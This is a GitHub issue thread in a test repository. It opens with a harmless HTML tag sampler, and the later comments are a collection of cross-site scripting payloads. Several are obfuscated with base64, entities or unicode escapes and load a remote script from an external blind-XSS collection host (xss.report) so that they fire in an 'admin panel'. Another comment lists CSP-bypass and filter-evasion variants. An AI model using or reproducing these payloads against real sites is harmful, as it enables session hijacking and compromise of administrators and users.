### ISSUE TITLE
ASasaS

### ISSUE THREAD

**Issue by joz0x** [rawezh80/newtest#2]
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>All HTML Tags with Examples</title>
</head>
<body>

<h1>All HTML Tags with Examples</h1>

<h2>Basic Tags</h2>
<h1>This is an h1 heading</h1>
<p>This is a paragraph</p>
<a href="https://www.example.com">This is a link</a>
<img src="https://via.placeholder.com/150" alt="Placeholder image">
<div>This is a division</div>
<span>This is a span</span>
<br>
<hr>

<h2>Formatting Tags</h2>
<strong>This text is bold</strong>
<em>This text is emphasized</em>
<mark>This text is marked</mark>
<sub>This text is subscripted</sub>
<sup>This text is superscripted</sup>
<blockquote>This is a blockquote</blockquote>
<q>This is a short quote</q>
<abbr title="HyperText Markup Language">HTML</abbr>
<address>Contact us at example@example.com</address>
<cite>This is a citation</cite>
<b>This text is bold</b>
<i>This text is italic</i>
<u>This text is underlined</u>
<del>This text is deleted</del>
<ins>This text is inserted</ins>
<s>This text is strikethrough</s>
<small>This text is small</small>
<big>This text is big</big>
<pre>This is preformatted text</pre>
<code>This is computer code</code>
<kbd>This is keyboard input</kbd>
<samp>This is sample output</samp>
<var>This is a variable</var>

<h2>Semantic Tags</h2>
<header>This is a header</header>
<footer>This is a footer</footer>
<nav>This is navigation</nav>
<article>This is an article</article>
<section>This is a section</section>
<aside>This is aside content</aside>
<main>This is main content</main>
<figure>
  <img src="https://via.placeholder.com/150" alt="Placeholder image">
  <figcaption>This is a figure caption</figcaption>
</figure>
<time datetime="2024-04-09">April 9, 2024</time>
<progress value="70" max="100">70%</progress>
<meter value="3" min="0" max="5">3 out of 5</meter>
<details>
  <summary>Click to toggle details</summary>
  <p>These are additional details</p>
</details>

<h2>Form Tags</h2>
<form>
  <label for="name">Name:</label>
  <input type="text" id="name" name="name"><br><br>
  <label for="email">Email:</label>
  <input type="email" id="email" name="email"><br><br>
  <label for="password">Password:</label>
  <input type="password" id="password" name="password"><br><br>
  <input type="submit" value="Submit">
</form>

<h2>Input Tags</h2>
<input type="text" placeholder="Text input">
<button>Click me</button>
<select>
  <option value="volvo">Volvo</option>
  <option value="saab">Saab</option>
  <option value="mercedes">Mercedes</option>
  <option value="audi">Audi</option>
</select>

</body>
</html>

**Comment by joz0x** [comment]
<svg width="400" height="110">
  <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
  <text x="20" y="50" fill="red">SVG Example</text>
</svg>

**Comment by joz0x** [comment]
<img src=x ox=xo>

**Comment by joz0x** [comment]
![falcon-svgrepo-com](https://github.com/rawezh80/newtest/assets/166255011/350d6a98-f79e-4509-9eb2-fed7b645e4a2)

**Comment by joz0x** [comment]
![photobx3](https://github.com/rawezh80/newtest/assets/166255011/9c083ec6-e3fd-4116-9cfe-0f890f98f8ab)

**Comment by rawezh80** [comment]
even for excute script
setTimeout
eval
setInterval
requestAnimationFrame   but show alert in admin panel

<img/&#09;&#10;&#11; src=`` onerror=eval(atob(this.id))
id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL3Jhd2V6aDEiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7
>
>>>> 1

</plaintext\></|\><plaintext/onmouseover=eval(atob(dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL3Jhd2V6aDEiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7))>
 >>> 1


<style/onload=setTimeout&#40;atob&#40;'dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL3Jhd2V6aDE5MTkiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7'&#41;&#41;>>
       >>>> 1

'<img src="r"
onerror="with(document)body.appendChild(createElement('script')).src='//xss.report/c/rawezh1'">

";'>">1</Title>with(document)body.appendChild(createElement('script')).src='//
https://xss.report/c/rawezh1'


<object
data=javascript&colon;\u0073\u0065\u0074\u0054\u0069\u006d\u0065\u006f\u0075\u0074(\u0061\u0074\u006f\u0062('dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL3Jhd2V6aDEiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7'))>
 >>>> 1

\u0022\u003e\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022setTimeout(atob(\dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL3Jhd2V6aDEiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7\u0027))\u0022\u003e
>>>> 1

'"></Title/</Style/</textArea<img src=https://xss.report/c/rawezh1
OnError=src>



jaVasCript:/*-/*/*\/*'/*"/**/(/* */onMouSeoVer=alert(1)
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=setInterval(atob('dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL3Jhd2V6aDEiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7'))//>\x3e
  >>>> 1


&#34;&gt;&lt;track/onerror=&#x27;setInterval&#40;atob&#40;'dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL3Jhd2V6aDEiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7'&#41;&#41;&#62;
>>>> 1

/*iframe/src*/<iframe/srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#41;&#59;&#97;&#46;&#115;&#114;&#99;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;xss.report/c/rawezh1&#34;&#59;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#97;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;"/onload=prompt(1)
/*iframe/src*/>

**Comment by rawezh80** [comment]
Weak CSP Bypass
1'"><!--><Base Href=//X55.is?

Regular JS Injection
1'-top['con\146irm'](1)-'

Quoteless JSi
/confirm?.(1)//\

<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<Details Open OnToggle=alert?.(1)>
<img/&#09;&#10;&#11; src=`` onerror=prompt(1)>
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;>>
"<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
</plaintext\></|\><plaintext/onmouseover=prompt(1)
\u0022\u003c%26quot;%26gt;%26lt;"';}};“></SCRIPT><img src=x
onerror=alert(69)>${{7*7}}
<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;
"><svg%20onload=alert%26%230000000040"mysanismine")>

`'";//><img/src=x onError="${x};alert(`1`);">

`'";//><Img Src=a OnError=location=src>

`'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))>

########

**Comment by rawezh000012** [comment]
> SVG Example

@`
<details><summary>Details</summary>
<p>

#

</p>
</details> `
